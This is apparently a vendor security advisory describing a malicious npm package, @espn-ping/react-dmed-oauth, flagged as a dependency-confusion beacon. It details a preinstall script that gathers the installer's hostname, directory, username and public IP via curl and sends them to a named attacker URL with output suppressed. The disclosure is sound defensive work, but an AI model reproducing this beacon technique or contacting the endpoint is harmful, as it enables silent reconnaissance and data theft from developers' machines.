CRITICAL npm Malware

Malicious code in @espn-ping/react-dmed-oauth (npm)

MAL-2026-10401 · GHSA-c99m-x4q9-727p

Published · Modified

Dependency scanning

Check whether @espn-ping/react-dmed-oauth is in your codebase

Corgea flags malicious and compromised dependencies with reachability analysis, so you fix the packages that actually run in your application instead of working through the whole lockfile.

Description


__

Source: amazon-inspector (3bc0467ac62043cf22dd249a99ff1279646dc599702140998ff5b86c79645364)

@espn-ping/react-dmed-oauth@666.0.0 declares a preinstall lifecycle script (node index.js > /dev/null 2>&1) that automatically executes on npm install. index.js shells out via child_process.exec to collect the installer's hostname, current working directory, username, and public IP (via curl https://ifconfig.me), then transmits the encoded data via curl -k GET to https://r.dontvisitmy.website/sendreq.php?newdata=.... Output is suppressed to hide the beacon from the installer's console. The scope @espn-ping and version 666.0.0 are consistent with a dependency-confusion beacon targeting an internal ESPN/Disney namespace.

Ready to move

Start Securing

Free, no credit card | First findings in minutes